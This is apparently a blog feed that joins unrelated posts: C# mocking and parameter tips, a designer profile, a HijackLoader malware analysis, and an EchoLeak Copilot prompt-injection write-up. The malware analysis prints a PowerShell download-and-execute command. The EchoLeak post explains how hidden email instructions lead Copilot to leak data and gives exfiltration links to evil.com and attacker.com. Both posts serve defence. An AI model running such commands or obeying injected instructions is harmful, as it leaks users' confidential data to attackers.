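For example, to verify that Transform received a string starting with “IT” – mirroring the filters used in the Setup examples above:

//Moq
moqMock.Verify(_ => _.Transform(It.Is<string>(s => s.StartsWith("IT"))));

//NSubstitute
nSubsMock.Received().Transform(Arg.Is<string>(s => s.StartsWith("IT")));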

    Verify the exact count of received calls

    Other times, you might want to verify that a method has been called exactly N times.

    With Moq, you can add a parameter to the Verify method:

    sut.TransformSingleItems(new string[] { "a", "b", "c" });
    
    moqMock.Verify(_ => _.Transform(It.IsAny<string>()), Times.Exactly(3));
    

Note that you can specify different values for that parameter, like Times.Exactly, Times.Never, Times.Once, Times.AtLeast, and so on.

With NSubstitute, on the contrary, you specify the exact count as a parameter to the Received method.

    sut.TransformSingleItems(new string[] { "a", "b", "c" });
    
    nSubsMock.Received(3).Transform(Arg.Any<string>());
    

    Reset received calls

As you remember, the mocked dependencies have been instantiated within the constructor, so every test method uses the same instance. This may cause some trouble, especially when checking how many calls the dependencies have received (the count of received calls accumulates across every test method run before). Therefore, we need to reset the count of the received calls.

In NUnit, you can define a method that runs before every test method, as long as it is decorated with the SetUp attribute:

    [SetUp]
    public void Setup()
    {
      // reset count
    }
    

Here we can reset the number of recorded method invocations on the dependencies and make sure that our test methods always use clean instances.

    With Moq, you can use Invocations.Clear():

    [SetUp]
    public void Setup()
    {
        moqMock.Invocations.Clear();
    }
    

    While, with NSubstitute, you can use ClearReceivedCalls():

    [SetUp]
    public void Setup()
    {
        nSubsMock.ClearReceivedCalls();
    }
    

    Further reading

As always, the best way to learn what a library can do is to head to its documentation. So, here you can find the links to the Moq and NSubstitute docs.

    🔗 Moq documentation | GitHub

    🔗 NSubstitute documentation | NSubstitute

    If you already use Moq but you are having some troubles testing and configuring IHttpClientFactory instances, I got you covered:

    🔗 How to test HttpClientFactory with Moq | Code4IT

    Finally, if you want to see the complete code of this article, you can find it on GitHub; I’ve written the exact same tests with both libraries so that you can compare them more easily.

    🔗 GitHub repository for the code used in this article | GitHub

    Conclusion

In this article, we’ve seen how Moq and NSubstitute allow us to perform some basic operations when writing unit tests with C#. They are similar, but each one has some functionality that the other lacks – or, at least, that I don’t know exists in both.

    Which library do you use, Moq or NSubstitute? Or maybe, another one?

    Happy coding!
    🐧




  • Craft, Clarity, and Care: The Story and Work of Mengchu Yao

    Craft, Clarity, and Care: The Story and Work of Mengchu Yao


    Hi, I’m Mengchu Yao from Taiwan, and I am currently based in Tokyo, Japan, where I work as a web designer at baqemono.inc.

I’m truly grateful to be able to pursue my design career in a cross-cultural environment. Life here allows me to appreciate small things and encourages me to stay curious and open-minded.

    Featured Work

    Movie × AI model

    We created the website for AI model Inc., a company that leverages AI models and virtual personalities to offer digital transformation (DX) services. The site was created to showcase their AI video generation solutions.

    Personal notes

This website design is centered around the concept of “natural and elegant AI-generated visuals”. One of the key challenges was to present a large number of dynamic, immersive visual elements and interactions within a single-page layout. We spent a lot of time finding the right balance between animation and delivering messages, ensuring that every motion looks beautiful and meaningful at the same time.

This was also a project where I sketched the animation for almost every section myself, working closely with developers to fine-tune the motion expressions. The process was both challenging and fascinating, which is why it was rewarding and significant for my growth.

    Vlag yokohama

    We created the official website for “Vlag yokohama,” a new members-only creative lounge and workspace located on the top (42nd) floor of the THE YOKOHAMA FRONT at Yokohama Station.

    Personal notes

    This project was a rare opportunity that allowed me to explore and be creative while using the brand guidelines as a foundation, in response to the request “to use the Yokohama cityscape as the backbone of visuals while incorporating elements that evoke the feeling of wind and motion.”

One thoughtful touch was the main visual on the homepage. It automatically changes with the time of day – morning, afternoon, and evening – representing Yokohama’s ambiance and giving a subtle delight to the browsing experience.

    ANGELUX

We created a brand-new corporate website for Angelux Co., Ltd., a company founded in 1987 that specializes in beauty salon and spa operations, with product development and sales in cosmetics.

    Personal notes

    This project began with the client’s request to clearly distinguish between the service website and the corporate site, and to position the latter as a recruitment platform that authentically reflects the people behind the brand.

    To embody Angelux’s strong emphasis on craftsmanship, we featured actual treatment scenes in the main visual. The overall design blends a sense of classic professionalism with a soft modern aesthetic, creating a calm and reassuring atmosphere. This approach not only helps build trust in the company but also effectively appeals to potential talent interested in joining Angelux.

The visual design incorporated elements reminiscent of high-quality cosmetics that convey the clean beauty and clarity of skincare.

    infordio

    We redesigned the official website for Infodio Inc., a company that specializes in advanced technologies such as AI-OCR and Natural Language Processing (NLP), and offers high-speed, automated transcription products and services.

    Personal notes

The original website failed to effectively communicate “AI as core”, and often misled the client’s applicants. To resolve the issue, our strategy was to emphasize the products. The revamp successfully conveys the true essence of the brand and attracts the right potential talent with clear messaging.

    For the visuals, we started from scratch. It was challenging but also the most fun part. As the products were the focal point of the design, the key was to show both the authenticity and visual appeal.

    Background

After getting my master’s degree in Information Design, I joined the Tokyo-based digital design studio baqemono.inc. Since then, I have had the opportunity to lead several challenging and creatively fulfilling projects from the early stages of my career.

    These experiences have shaped me tremendously and deepened my passion for this field. Throughout this journey, the studio’s founder has remained the designer I admire the most — a constant source of inspiration whose presence reminds me to approach every project with both respect and enthusiasm.

    Design Philosophy

    A strong concept is your north star

    I believe every design should be built upon a clear and compelling core idea. Whenever I begin a project, I always ask myself: “What am I designing for?”

    Structure comes first

    Before diving into visuals, I make sure I spend enough time on wireframes and the overall structure.
If the content and hierarchy aren’t clearly defined at the start, the rest of the bits and pieces become noises that cloud judgment. A solid framework helps me stay focused and gives me room to refine the details.

    Listen to the discomfort in your gut

    Whenever I feel that something’s “not quite right”, I always know I’d have to come back to take another look because these subtle feelings often point to something important.
 I believe that as designers we should be honest with ourselves, take a pause to examine, and revise. Each small tweak is a step closer to your truth.

    You have to genuinely love it

I also believe that every designer should love their own work so that the work can make an impact.
This isn’t just about aesthetics — it’s about fully owning the concept, the details, and the final outcome.

    Teamwork is everything

    No project is ever completed by me alone — it’s always the result of a team effort.
 I deeply respect every member involved, and I constantly ask myself: “What can I do to make the collaboration smoother for everyone?”

    Tools and Techniques

    • Photoshop
    • Figma
    • After Effects
    • Eagle

    Future goals

    My main goal for the year is to start building my portfolio website. I’ve been mainly sharing my work on social media, but as I’ve gained more hands-on experience and creative outputs over time, I realized that it’s important to have a dedicated space that fully reflects who I am as a designer today.

    Recently, I started to make some changes in my daily routine, such as better sleeping hours and becoming a morning person to be more focused and productive for my work. My mind is clearer, and my body feels great, just as if I’m preparing myself for the next chapter of my creative journey.

    Final Thoughts

    Giving someone advice is always a little tricky for me, but one phrase that has resonated deeply with me throughout my journey is: “Go slow to go fast”. Finding your own balance between creating and resting while continuing to stay passionate about life is, to me, the most important thing of all.

    Thank you so much for taking the time to read this. I hope you enjoyed the works and thoughts I’ve shared!

    A heartfelt thanks as well to Codrops and Manoela for inviting me to be part of this Designer Spotlight. Ever since I stepped into the world of web design, Codrops has been a constant source of inspiration, showing me so many amazing works and creators. I’m truly honored and grateful to be featured among them.

    Contact

    I’m always excited to connect with people to share ideas and explore new opportunities together.
If anything here speaks to you, feel free to reach out — I’d love to chat more and hear your thoughts!
    I also share updates on my latest projects from time to time on social media, so feel free to drop by and say hi 😊




  • An Analysis of the Clickfix HijackLoader Phishing Campaign 

    An Analysis of the Clickfix HijackLoader Phishing Campaign 


    Table of Contents 

• The Evolving Threat of Attack Loaders
• Technical Methodology and Analysis
  • Initial Access and Social Engineering
  • Multi-Stage Obfuscation and De-obfuscation
  • Anti-Analysis Techniques
• Quick Heal \ Seqrite Protection

     

    Introduction 

    With the evolution of cyber threats, the final execution of a malicious payload is no longer the sole focus of the cybersecurity industry. Attack loaders have emerged as a critical element of modern attacks, serving as a primary vector for initial access and enabling the covert delivery of sophisticated malware within an organization. Unlike simple payloads, loaders are engineered with a dedicated purpose: to circumvent security defenses, establish persistence, and create a favorable environment for the hidden execution of the final-stage malware. This makes them a more significant and relevant threat that demands focused analysis. 

We have recently seen a surge in HijackLoader malware. It first emerged in the second half of 2023 and quickly gained attention due to its ability to deliver payloads and its interesting techniques for loading and executing them. It is mostly offered as Malware-as-a-Service and has been observed mainly in financially motivated campaigns globally.

    HijackLoader has been distributed through fake installers, SEO-poisoned websites, malvertising, and pirated software/movie portals, which ensures a wide and opportunistic victim base. 

Since June 2025, we have observed attackers using Clickfix to lead unsuspecting victims into downloading malicious .msi installers that, in turn, resulted in HijackLoader execution. At the time, DeerStealer was observed being downloaded as the final executable on the victim’s machine.

    Recently, TAG-150 has also emerged with CastleLoader/CastleBot, while leveraging external services such as HijackLoader as part of its broader Malware-as-a-Service ecosystem.

    HijackLoader frequently delivers stealers and RATs while continuously refining its tradecraft. It is particularly notorious for advanced evasion techniques such as: 

    • Process doppelgänging with transacted sections 
    • Direct syscalls under WOW64 

    Since its discovery, HijackLoader has continuously evolved, presenting a persistent and rising threat to various industries. Therefore, it is critical for organizations to establish and maintain continuous monitoring for such loaders to mitigate the risk of sophisticated, multi-stage attacks. 

    Infection Chain 


    Technical Overview 

    The initial access starts with a CAPTCHA-based social engineering phishing campaign, which we have identified as Clickfix (the same technique was seen in use by attackers in June 2025).

    Fig1: CAPTCHA-Based Phishing Page for Social Engineering
    Fig2: HTA Dropper File for Initial Execution

     This HTA file serves as the initial downloader, leading to the execution of a PowerShell file.   

    Fig3: Initial PowerShell Loader Script

    Upon decoding the above Base64-encoded string, we obtained another PowerShell script, as shown below. 

    Fig4: First-Stage Obfuscated PowerShell Script

    The above decoded PowerShell script is heavily obfuscated, presenting a significant challenge to static analysis and signature-based detection. Instead of using readable strings and variables, it dynamically builds commands and values through complex mathematical operations and the reconstruction of strings from character arrays. 
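
    To make that concrete, here is a minimal sketch of the string-reconstruction trick, shown in C# for readability (illustrative only; the actual sample does this in PowerShell, across many more layers):

    // The command name never appears as a literal string; it is rebuilt
    // from character codes at runtime, defeating naive string signatures.
    char[] codes = { (char)105, (char)101, (char)120 }; // 'i', 'e', 'x'
    string hidden = new string(codes); // "iex"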

    While resolving the above payload, we see that it decodes into the command below, which, while still unreadable, can be fully de-obfuscated.

    Fig5: Deobfuscation of the First stage obfuscated payload

    After full de-obfuscation, we see that the script attempts to connect to a URL to download a subsequent file.  

    iex ((New-Object System.Net.WebClient).DownloadString('https://rs.mezi[.]bet/samie_bower.mp3'))

    When run in a debugger, this script returns an error, indicating it is unable to connect to the URL.  

    Fig6: Debugger View of Failed C2 Connection

    The file samie_bower.mp3 is another PowerShell script, which, at over 18,000 lines, is heavily obfuscated and represents the next stage of the loader.

    Fig7: Mainstage PowerShell Loader (samie_bower.mp3)

    Through debugging, we observe that this PowerShell file performs numerous Anti-VM checks, including inspecting the number of running processes and making changes to the registry keys.  

    Fig8: Anti-Virtual Machine and Sandbox Evasion Checks

    These checks appear to specifically target and read VirtualBox identifiers to determine if the script is running in a virtualized environment. 

    While analyzing the script, we observed that the final payload resides within the last few lines, which is where the initial obfuscated loader delivers the final malicious command. 

    Fig9: Final execution

    Resolving the above gibberish variable declarations shows that, upon execution, the script performs Base64 decoding, XOR operations, and additional decryption routines before loading another PowerShell script that likely injects the PE file.

    Fig10: Intermediate PowerShell Script for PE Injection
    Fig11: Base64-Encoded Embedded PE Payload
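
    As a rough illustration of that routine, a minimal analyst-side decoder sketch in C# might look like the following. The single-byte XOR key is an assumption for illustration; the real key has to be recovered from the script itself.

    using System;

    static class StageDecoder
    {
        // Reverse the layering described above: Base64-decode, then XOR.
        public static byte[] Decode(string base64Blob, byte xorKey)
        {
            byte[] raw = Convert.FromBase64String(base64Blob);
            for (int i = 0; i < raw.Length; i++)
                raw[i] ^= xorKey; // hypothetical single-byte key
            return raw; // next-stage script text or PE bytes
        }

        // Blobs that start with the ASCII bytes 'M' 'Z' (0x4D 0x5A) are
        // DOS/PE executables, i.e. the MZ header discussed below.
        public static bool LooksLikePe(byte[] blob) =>
            blob.Length > 1 && blob[0] == 0x4D && blob[1] == 0x5A;
    }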

     

    Decoding this file reveals an embedded PE file, identifiable by its MZ header. 

    Fig12: Decoded PE File with MZ Header

    This PE file is a heavily packed .NET executable. 

    Fig13: Packed .NET Executable Payload

    The executable payload loads a significant amount of code, likely extracted from its resources section. 

    Fig14: In-Memory Unpacking of the .NET Executable

    Once unpacked, the executable payload appears to load a DLL file. 

    Fig15: Protected DLL Loaded In-Memory

    This DLL file is also protected, likely to prevent reverse engineering and analysis. 

    Fig16: DLL Protection Indicators

    HijackLoader has a history of using a multi-stage process involving an executable followed by a DLL. This final stage of the loader attempts to connect to a C2 server, from which an infostealer malware is downloaded. In this case, the malware attempts to connect to the URL below. 

    Fig17: Final C2 Server Connection Attempt

    While this C2 is no longer accessible, the connection attempt is consistent with the behavior of NekoStealer malware. HijackLoader has also been observed downloading other stealers, including Lumma.

    Conclusion 

    Successfully defending against sophisticated loaders like HijackLoader requires shifting the focus from static, final-stage payloads to their dynamic and continuously evolving delivery mechanisms. By concentrating on detecting the initial access and intermediate stages of obfuscation, organizations can build more resilient defenses against this persistent threat. It is equally important to adopt a proactive approach across all layers, rather than focusing solely on the initial access or the final payload. The intermediate layers are often where attackers introduce the most significant changes to facilitate successful malware deployment. 

    IOCs: 

    • 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57 
    • 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4 
    • 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df 
    • 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d 
    • 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184 
    • e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82 
    • 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd 
    • c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e 
    • d0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4
    • 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee 
    • hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta  
    • 91[.]212[.]166[.]51 
    • 37[.]27[.]165[.]65:1477 
    • cosi[.]com[.]ar 
    • hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3 
    • hxxp[:]//77[.]91[.]101[.]66/ 

    Quick Heal \ Seqrite Protection: 

    • Script.Trojan.49900.GC 
    • Loader.StealerDropperCiR 
    • Trojan.InfoStealerCiR 
    • Trojan.Agent 
    • BDS/511 

    MITRE ATT&CK:

    Tactic | Technique ID | Technique Name
    Initial Access | T1566.002 | Phishing: Spearphishing Link (CAPTCHA phishing page)
    Initial Access | T1189 | Drive-by Compromise (malvertising, SEO poisoning, fake installers)
    Execution | T1059.001 | Command and Scripting Interpreter: PowerShell
    Defense Evasion | T1027 | Obfuscated Files or Information (multi-stage obfuscated scripts)
    Defense Evasion | T1140 | Deobfuscate/Decode Files or Information (Base64, XOR decoding)
    Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools (unhooking DLLs)
    Defense Evasion | T1070.004 | Indicator Removal: File Deletion (likely used in staged loaders)
    Defense Evasion | T1211 | Exploitation for Defense Evasion (direct syscalls under WOW64)
    Defense Evasion | T1036 | Masquerading (fake extensions like .mp3 for PowerShell scripts)
    Discovery | T1082 | System Information Discovery (VM checks, registry queries)
    Discovery | T1497.001 | Virtualization/Sandbox Evasion: System Checks
    Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys (registry tampering)
    Persistence / Privilege Escalation | T1055 | Process Injection (PE injection routines)
    Command and Control | T1071.001 | Application Layer Protocol: Web Protocols (HTTP/HTTPS C2 traffic)
    Command and Control | T1105 | Ingress Tool Transfer (downloading additional payloads)
    Impact / Collection | T1056 / T1005 | Input Capture / Data from Local System (info-stealer functionality of the final payload)

     

    Authors: 

    Niraj Lazarus Makasare 

    Shrutirupa Banerjiee 



    Source link

  • Don’t use too many method arguments | Code4IT

    Don’t use too many method arguments | Code4IT



    Many times, we tend to add too many parameters to a function. But that’s not the best idea: on the contrary, when a function requires too many arguments, grouping them into coherent objects helps you write simpler code.

    Why? How can we do it? What are the main issues with having too many params? Have a look at the following snippet:

    void SendPackage(
        string name,
        string lastname,
        string city,
        string country,
        string packageId
        ) { }
    

    If you need to use another field about the address or the person, you will need to add a new parameter and update every existing call to match the new method signature.

    What if we added a State argument? Is it part of the address (state = "Italy") or something related to the package (state = Damaged)?

    Storing this field in the correct object helps clarify its meaning.

    void SendPackage(Person person, string packageId) { }
    
    class Person {
        public string Name { get; set; }
        public string LastName { get; set; }
        public Address Address {get; set;}
    }
    
    class Address {
        public string City { get; set; }
        public string Country { get; set; }
    }
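
    A call site might then look like this (a hypothetical usage sketch; the values are placeholders):

    var person = new Person
    {
        Name = "Alice",
        LastName = "Smith",
        Address = new Address { City = "Turin", Country = "Italy" }
    };
    SendPackage(person, "PKG01");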
    

    Another reason to avoid using lots of parameters? To avoid merge conflicts.

    Say that two devs, Alice and Bob, are working on functionalities that impact the SendPackage method. Alice, on her branch, adds a new param, bool withPriority. In the meanwhile, Bob, on his branch, adds bool applyDiscount. Then both Alice and Bob merge their branches into the main one. What’s the result? Of course, a conflict: the method now has two boolean parameters, and the order in which they appear in the merged signature can cause trouble. Even worse, every call to SendPackage now passes one (or two) new arguments whose value depends on the context, so after the merge the value Bob intended for applyDiscount might end up being used for the parameter added by Alice, as the sketch below shows.
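
    Here is that hazard in miniature, reusing the refactored signature from above (the merged parameter order and the default values are hypothetical):

    void SendPackage(
        Person person,
        string packageId,
        bool withPriority = false,  // added by Alice
        bool applyDiscount = false) // added by Bob
    { }

    // On Bob's branch, this call meant "apply the discount":
    SendPackage(person, "PKG01", true);
    // After the merge, `true` binds positionally to withPriority instead,
    // and the discount is silently lost. Named arguments avoid the trap:
    SendPackage(person, "PKG01", applyDiscount: true);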

    Conclusion

    To recap, why do we need to reduce the number of parameters?

    • to give context and meaning to those parameters
    • to avoid errors caused by positional parameters
    • to avoid merge conflicts

    👉 Let’s discuss it on Twitter or in the comment section below!

    🐧





    Source link

  • The Silent AI Threat Hacking Microsoft 365 Copilot

    The Silent AI Threat Hacking Microsoft 365 Copilot


    Introduction:

    What if your AI assistant wasn’t just helping you – but quietly helping someone else too?

    A recent zero-click exploit known as EchoLeak revealed how Microsoft 365 Copilot could be manipulated to exfiltrate sensitive information – without the user ever clicking a link or opening an email. Microsoft 365 Copilot, the AI tool built into Microsoft Office workplace applications including Word, Excel, Outlook, PowerPoint, and Teams, harbored a critical security flaw that, according to researchers, signals a broader risk of AI agents being hacked.

    Imagine an attack so stealthy it requires no clicks, no downloads, no warning – just an email sitting in your inbox. This is EchoLeak, a critical vulnerability in Microsoft 365 Copilot that lets hackers steal sensitive corporate data without a single action from the victim.

    Vulnerability Overview:

    In the case of Microsoft 365 Copilot, the vulnerability lets a hacker trigger an attack simply by sending an email to a user, with no phishing or malware needed. Instead, the exploit uses a series of clever techniques to turn the AI assistant against itself.

    Microsoft 365 Copilot acts based on user instructions inside Office apps to do things like access documents and produce suggestions. If infiltrated by hackers, it could be used to target sensitive internal information such as emails, spreadsheets, and chats. The attack bypasses Copilot’s built-in protections, which are designed to ensure that only users can access their own files—potentially exposing proprietary, confidential, or compliance-related data.

    Discovered by Aim Security, it’s the first documented zero-click attack on an AI agent, exposing the invisible risks lurking in the AI tools we use every day.

    One crafted email is all it takes. Copilot processes it silently, follows hidden prompts, digs through internal files, and sends confidential data out, all while slipping past Microsoft’s security defenses, according to Aim Security’s blog post.

    EchoLeak exploits Copilot’s ability to handle both trusted internal data (like emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing specific markdown syntax, like ![Image alt text][ref] [ref]: https://www.evil.com?param=<secret>. When Copilot automatically scans the email in the background to prepare for user queries, it triggers a browser request that sends sensitive data, such as chat histories, user details, or internal documents, to an attacker’s server.

    Attack Flow:

    From Prompt to Payload: How Attackers Hijack Copilot’s AI Pipeline to Exfiltrate Data Without a Single Click. Let’s walk through each stage in detail below!

    1. Crafting and Sending the Malicious Input: The attacker begins by composing a malicious email or document that contains a hidden prompt injection payload. This payload is crafted to be invisible or unnoticeable to the human recipient but fully parsed and executed by Microsoft 365 Copilot during AI-assisted processing. To conceal the injected instruction, the attacker uses stealth techniques such as HTML comments.
    2. Copilot Processes the Hidden Instructions: When the recipient opens the malicious email or document, or uses Microsoft 365 Copilot to perform actions such as summarizing content, replying to the message, drafting a response, or extracting tasks, Copilot automatically ingests and analyzes the entire input. Due to insufficient input validation and a lack of prompt isolation, Copilot does not distinguish between legitimate user input and attacker-controlled instructions hidden within the content. Instead, it treats the injected prompts as part of the user’s intended instruction set and executes the hidden commands. At this stage, Copilot has unknowingly acted on the attacker’s instructions, misinterpreting them as part of its legitimate task, thereby enabling the next stage of the attack: leakage of sensitive internal context.
    3. Copilot Generates Output Containing Sensitive Context: After interpreting and executing the hidden prompt injected by the attacker, Microsoft 365 Copilot constructs a response that includes sensitive internal data, as instructed. This output is typically presented in a way that appears legitimate to the user but is designed to covertly exfiltrate information. To conceal the exfiltration, the AI is prompted (by the hidden instruction) to embed this sensitive data within a markdown-formatted hyperlink, for example:

    [Click here for more info](https://attacker.com/exfiltrate?token={{internal_token}})

    To the user, the link seems like a helpful reference. In reality, it is a carefully constructed exfiltration vector, ready to transmit data to the attacker’s infrastructure once the link is accessed or previewed.

    4. Link Creation to an Attacker-Controlled Server: The markdown hyperlink generated by Copilot, under the influence of the injected prompt, points to a server controlled by the attacker. The link is designed to embed sensitive context data (extracted in the previous step) directly into the URL, typically using query parameters or path variables, such as: https://attacker-domain.com/leak?data={{confidential_info}} or https://exfil.attacker.net/{{internal_token}}

    These links often appear generic or helpful, making them less likely to raise suspicion. The attacker’s goal is to ensure that when the link is clicked, previewed, or even automatically fetched, the internal data (like session tokens, document content, or authentication metadata) is transmitted to their server without any visible signs of compromise.

    5. Data Exfiltration Triggered by User Action or System Preview: Once the Copilot-generated response containing the malicious link is delivered to the victim (or another internal user), the exfiltration process is triggered through either direct interaction or passive rendering. As a result, the attacker receives requests containing valuable internal information, such as authentication tokens, conversation snippets, or internal documentation, without raising suspicion. This concludes the attack chain with a successful and stealthy data exfiltration.

    Mitigation Steps:

    To effectively defend against EchoLeak-style prompt injection attacks in Microsoft 365 Copilot and similar AI-powered assistants, organizations need a layered security strategy that spans input control, AI system design, and advanced detection capabilities.

    1. Prompt Isolation

    One of the most critical safeguards is ensuring proper prompt isolation within AI systems. This means the AI should clearly distinguish between user-provided content and internal/system-level instructions. Without this isolation, any injected input — even if hidden using HTML or markdown — could be misinterpreted by the AI as a command. Implementing robust isolation mechanisms can prevent the AI from acting on malicious payloads embedded in seemingly innocent content.

    2. Input Sanitization and Validation

    All user inputs that AI systems process should be rigorously sanitized. This includes stripping out or neutralizing hidden HTML elements like <div style="display:none;">, zero-width characters, base64-encoded instructions, and obfuscated markdown. Validating URLs and rejecting untrusted domains or malformed query parameters further strengthens this defense. By cleansing the input before the AI sees it, attackers lose their ability to smuggle in harmful prompt injections.
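
    As a sketch of what such a filter could look like (illustrative only, not Copilot’s actual pipeline; the allowlist host is a made-up placeholder):

    using System;
    using System.Text.RegularExpressions;

    static class PromptSanitizer
    {
        // Hypothetical allowlist; a real deployment would source this from policy.
        static readonly string[] AllowedHosts = { "contoso.sharepoint.com" };

        public static string Sanitize(string input)
        {
            // Drop elements hidden via inline styles (e.g., display:none).
            input = Regex.Replace(input,
                @"<[^>]+style\s*=\s*[""'][^""']*display\s*:\s*none[^""']*[""'][^>]*>.*?</[^>]+>",
                string.Empty, RegexOptions.IgnoreCase | RegexOptions.Singleline);
            // Drop HTML comments and zero-width characters.
            input = Regex.Replace(input, @"<!--.*?-->", string.Empty, RegexOptions.Singleline);
            input = Regex.Replace(input, "[\u200B\u200C\u200D\uFEFF]", string.Empty);
            return input;
        }

        // Reject links whose host is not explicitly trusted.
        public static bool IsAllowedLink(Uri uri) =>
            Array.Exists(AllowedHosts, h => uri.Host.Equals(h, StringComparison.OrdinalIgnoreCase));
    }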

    3. Disable Auto-Rendering of Untrusted Content

    A major enabler of EchoLeak-style exfiltration is the automatic rendering of markdown links and image previews. Organizations should disable this functionality, especially for content from unknown or external sources. Preventing Copilot or email clients from automatically previewing links thwarts zero-click data exfiltration and gives security systems more time to inspect the payload before it becomes active.

    4. Context Access Restriction

    Another key mitigation is to limit the contextual data that Copilot or any LLM assistant has access to. Sensitive assets like session tokens, confidential project data, authentication metadata, and internal communications should not be part of the AI’s input context unless necessary. This limits the scope of what can be leaked even if a prompt injection does succeed.

    5. AI Output Monitoring and Logging

    Organizations should implement logging and monitoring on all AI-generated content, especially when the output includes dynamic links, unusual summaries, or user-facing recommendations. Patterns such as repeated use of markdown, presence of tokens in hyperlinks, or prompts that appear overly “helpful” may indicate abuse. Monitoring this output allows for early detection of exfiltration attempts and retroactive analysis if a breach occurs.
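
    A minimal sketch of such a check might flag AI-generated markdown links that carry query-string data to hosts outside an allowlist (the names and heuristics here are assumptions for illustration):

    using System;
    using System.Text.RegularExpressions;

    static class OutputMonitor
    {
        // Matches markdown links of the form [text](https://host/path?query).
        static readonly Regex MarkdownLink =
            new Regex(@"\[[^\]]*\]\((?<url>https?://[^)\s]+)\)", RegexOptions.IgnoreCase);

        public static bool LooksLikeExfiltration(string aiOutput, string[] trustedHosts)
        {
            foreach (Match m in MarkdownLink.Matches(aiOutput))
            {
                if (!Uri.TryCreate(m.Groups["url"].Value, UriKind.Absolute, out var uri))
                    continue;
                bool untrustedHost = Array.IndexOf(trustedHosts, uri.Host) < 0;
                bool carriesData = !string.IsNullOrEmpty(uri.Query); // data in query params
                if (untrustedHost && carriesData)
                    return true; // log and hold for review instead of rendering
            }
            return false;
        }
    }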

    6. User Training and Awareness

    Since users are the final recipients of AI-generated content, it’s important to foster awareness about the risks of interacting with AI-generated links or messages. Employees should be trained to recognize when a link or message seems “too intelligent,” unusually specific, or out of context. Encouraging users to report suspicious content—even if it was generated by a trusted assistant like Copilot—helps build a human firewall against social-engineered AI abuse.

    Together, these mitigation steps form a comprehensive defense strategy against EchoLeak, bridging the gap between AI system design, user safety, and real-time threat detection. By adopting these practices, organizations can stay resilient as AI-based threats evolve.

    References:

    https://www.aim.security/lp/aim-labs-echoleak-blogpost

    Author:

    Nandini Seth

    Adrip Mukherjee



    Source link